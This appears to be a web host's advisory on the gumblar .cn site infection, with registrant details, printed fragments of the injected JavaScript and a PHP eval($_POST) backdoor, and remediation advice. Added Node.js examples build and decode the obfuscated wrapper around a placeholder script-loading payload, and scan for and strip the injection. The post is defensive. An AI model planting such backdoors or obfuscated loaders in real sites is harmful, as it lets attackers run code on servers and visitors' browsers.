One Supreme Center Hosting customer fought this exploit continuously for over a month: almost as soon as the injected code was removed, it came back. The gumblar .cn exploit is reported to include 1350 scripting exploits and 12 trojans. The gumblar .cn domain is currently blacklisted by Google, which reports 24 scripting exploits and 6 trojans for it. Here is the information we obtained on gumblar .cn:
Domain: gumblar. cn
IP: 94.229.65.172
Reverse Lookup: no.rdns-yet.ukservers.com
Registrant: TiankaiCui cuitiankai@googlemail.com
An IP address lookup found it was associated with:
Alexander A Solovyov
LIMT Group Ltd.
Karpinskogo 97a
Moscow
111423
Russian Federation
The ARIN record for the IP address shows that it “belongs to” UK Dedicated Servers Limited. We contacted the UK Dedicated Servers abuse department by email and received this response from David Howes:
“Thanks for your concern, we have been made aware of this issue already and removed this server from our network. We are now in the process of contacting the relevant authorities to provide them with as much information as possible.”
“Having spent the last hour or so researching this compromise/exploit it does seem to have been around for a little while, and I am rather surprised that given the number of newsgroup/forum/blog articles etc regarding it you are the first to have contacted us about it.
I only found out about the issue a couple of hours ago, when it was pointed out to me by an acquaintance. I decided to look through our abuse inbox to see if there was any reference to it and yours was the only email we have on the subject!!”
Not sure if you have been infected? Hop on over to Unmask Parasites and scan your website.
If you are fighting this exploit, here are some things you need to know.
Infected websites contain JavaScript code that may look like this [partial code displayed]:
(function(jil){var xR5p='%';eval(unescape((
Every infected website has its own version of the script, but all versions share code that identifies them as the gumblar .cn exploit.
The JavaScript starts with “(function(”: an anonymous function. The payload is percent-encoded, so most characters appear as their numeric codes, and the “%” character itself is replaced by some arbitrary character. Near the end of the script there is a “.replace(” call; at the very end you will usually find a regular expression such as /"/g or /~/g that puts the “%” characters back so that unescape() can decode the payload before it is passed to eval().
When the script is executed, another script is loaded and executed. The code is usually injected right before the body tag but can be found in other parts of the page. Unlike the recent iframe exploits, the gumblar exploit is injected into every web page, including .js (JavaScript) files [usually at the bottom]. Perhaps coincidentally, most of the infected sites seem to use PHP.
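As an added example (not code from the original post), the following Node.js script reproduces the wrapper shape described above on a constructed payload and then recovers that payload statically, without ever calling eval(). The payload, the host name loader.invalid, the variable names jil and xR5p, and the set of marker characters are assumptions for illustration only.

```javascript
// Added example, not code from the original post. Demonstrates the wrapper
// shape described above on a constructed payload and recovers the payload
// statically. Nothing here is executed with eval().

// Builds a wrapper of the described shape (the "encoder" side). The payload
// is percent-encoded with escape(), every '%' is swapped for `marker`, and
// the run-time code restores '%' with .replace(/marker/g,'%') before
// unescape() and eval(). Variable names jil/xR5p mirror the snippet above.
function buildWrapper(payload, marker) {
  // escape() leaves only [A-Za-z0-9@*_+-./] unencoded, so these markers can
  // never collide with the encoded text; they are also safe inside /.../g.
  if (!/^["~#!&]$/.test(marker)) {
    throw new Error('marker must be one of " ~ # ! &');
  }
  const encoded = escape(payload).split('%').join(marker);
  return `(function(jil){var xR5p='${marker}';` +
         `eval(unescape(('${encoded}').replace(/${marker}/g,'%')))})();`;
}

// Recovers the payload from a wrapper of that shape without running it:
// read the marker out of the trailing replace(), put the '%' signs back and
// unescape(). Returns null when the expected structure is absent.
function decodeWrapper(source) {
  const m = source.match(
    /eval\(unescape\(\('([^']*)'\)\.replace\(\/(.)\/g,'%'\)\)\)/);
  if (!m) return null;
  const [, encoded, marker] = m;
  return unescape(encoded.split(marker).join('%'));
}

// Demo on a constructed payload: a document.write() that pulls a second
// script from a placeholder host (.invalid TLD, so it resolves nowhere).
const samplePayload =
  'document.write(\'<script src="http://loader.invalid/x.js"></script>\');';
const wrapped = buildWrapper(samplePayload, '~');
console.log(wrapped);
console.log(decodeWrapper(wrapped) === samplePayload); // true
```

Decoding this way is safe to run on a captured sample because the recovered payload is only returned as a string; to see what the second-stage script does, read the decoded text rather than executing it.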
PHP files contain code that may look like this [partial code displayed]:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64_decode
The infection does not appear to be server-wide: we checked the server our client is on, and theirs was the only infected site. The exploit may be caused by compromised FTP credentials.
A good place to start is your own computer. Scan it for malware, spyware and viruses. You might download Malwarebytes, update its definitions, boot into Safe Mode (press F8 at startup) and run a full scan, removing any malware it finds.
After you have completely scanned your system, change your FTP passwords. It also would not hurt to change ALL passwords [cPanel, MySQL databases]. Then remove the malicious code from all infected files (.html, .php, .js). If you have a clean backup of your website, use it. We ended up deleting all files from our client's account and restoring a full backup; so far, so good.
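As an added example (not code from the original post), the Node.js script below covers the clean-up step above and the PHP backdoor shape shown earlier: it scans .html, .htm, .php and .js files for the injected JavaScript wrapper and for eval() of raw POST data, and strips the wrapper from HTML and JavaScript files. The sample files, their names and the encoded strings in them are constructed to resemble those shapes and are not real captures; scanTree() is the only part that touches a real directory.

```javascript
// Added example, not code from the original post. Scans site files for the
// two markers described above and strips the injected JavaScript; the sample
// files below are constructed to resemble those shapes, not real captures.

// Heuristic from the post for the injected JavaScript: an anonymous
// function, eval(unescape(...)), and a trailing .replace(/X/g,'%').
function isGumblarWrapper(code) {
  return /^\s*\(function\(/.test(code) &&
         /eval\(unescape\(/.test(code) &&
         /\.replace\(\/.\/g,\s*['"]%['"]\)/.test(code);
}

// In .js files the wrapper is appended at the bottom, so test the tail that
// starts at the last "(function(". Returns its offset, or -1.
function findJsWrapper(text) {
  const i = text.lastIndexOf('(function(');
  return i >= 0 && isGumblarWrapper(text.slice(i)) ? i : -1;
}

const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// eval() of raw POST data is the backdoor's giveaway, whatever the random
// parameter name happens to be on a given site.
const PHP_BACKDOOR_RE = /eval\(\s*\$_POST\[/;

function extOf(name) {
  const i = name.lastIndexOf('.');
  return i >= 0 ? name.slice(i).toLowerCase() : '';
}

// Returns a list of {type, offset} findings for one file's contents.
function scanContent(name, text) {
  const ext = extOf(name);
  const findings = [];
  if (ext === '.html' || ext === '.htm' || ext === '.php') {
    for (const m of text.matchAll(SCRIPT_RE)) {
      if (isGumblarWrapper(m[1])) findings.push({ type: 'js-wrapper', offset: m.index });
    }
  }
  if (ext === '.js') {
    const i = findJsWrapper(text);
    if (i >= 0) findings.push({ type: 'js-wrapper', offset: i });
  }
  if (ext === '.php') {
    const m = PHP_BACKDOOR_RE.exec(text);
    if (m) findings.push({ type: 'php-backdoor', offset: m.index });
  }
  return findings;
}

// Removes injected wrapper <script> elements (.html/.htm/.php) or the
// appended wrapper (.js). The PHP backdoor is deliberately left alone: it
// is spliced into the file's own code, so restore such files from backup.
function removeWrapper(name, text) {
  if (extOf(name) === '.js') {
    const i = findJsWrapper(text);
    return i >= 0 ? text.slice(0, i).replace(/\s+$/, '') + '\n' : text;
  }
  return text.replace(SCRIPT_RE, (whole, body) => (isGumblarWrapper(body) ? '' : whole));
}

// Walks a real directory (fs is loaded here so the in-memory demo below
// needs no filesystem) and returns {path: findings} for every hit.
function scanTree(dir) {
  const fs = require('fs');
  const out = {};
  for (const ent of fs.readdirSync(dir, { withFileTypes: true })) {
    const p = dir + '/' + ent.name;
    if (ent.isDirectory()) Object.assign(out, scanTree(p));
    else if (['.html', '.htm', '.php', '.js'].includes(extOf(ent.name))) {
      const f = scanContent(ent.name, fs.readFileSync(p, 'utf8'));
      if (f.length) out[p] = f;
    }
  }
  return out;
}

// Constructed sample files (not real captures) in the shapes the post shows.
const SAMPLE_FILES = {
  'index.html': `<html><body><p>hello</p>\n<script>(function(jil){var xR5p='%';eval(unescape(('~3Cb~3E').replace(/~/g,'%')))})();</script></body></html>`,
  'site.js': `function ok(){return 1;}\n(function(q){var z='%';eval(unescape(('~61').replace(/~/g,'%')))})();`,
  'index.php': `<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))\neval($_POST['tmp_lkojfghx3']);} ?>\n<html><body>site</body></html>`,
  'clean.html': `<html><body><script>document.write("ok")</script></body></html>`,
};

for (const [name, text] of Object.entries(SAMPLE_FILES)) {
  console.log(name, scanContent(name, text));
}
```

To check a real account, call scanTree('/path/to/public_html') and review the findings before writing anything back; treat any php-backdoor hit as a reason to restore that file from a known-clean backup rather than editing it in place, since the attacker's PHP is mixed into the file's own code.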
Malicious code has been known to exploit older versions of Adobe Acrobat Reader. adobe_updater can be a legitimate Adobe Auto Updater service that starts every time you launch an Adobe product; since the virus needs to open Acrobat Reader, it also triggers the updater. There are known security issues in the latest (9.1) version of Adobe Acrobat Reader, and Adobe suggests disabling JavaScript support altogether.
It has also been suggested that Adobe Flash Player may be affected. When updating Adobe Acrobat Reader, update Adobe Flash Player as well.
Exploit Infection Prevention
How does one prevent the spread of a nasty virus? First, thoroughly wash your hands with soap and water [yes, you do need to use soap!]. After your hands are free of all nasal mucus, update your anti-virus and malware/spyware applications.
It is said that resistance to, and recovery from, viral infections depend on the interactions between virus and host. To prevent or limit infection, the host needs barriers inherent to the organism; these barriers are the first line of defense. It's no secret that Internet Explorer lacks the necessary barriers. Stop using Internet Explorer. We suggest Firefox with the NoScript add-on. As Benjamin Franklin said, “An ounce of prevention is worth a pound of cure.”
Update your scripts to the latest version[s]. Keeping them updated is your responsibility as a hosting customer.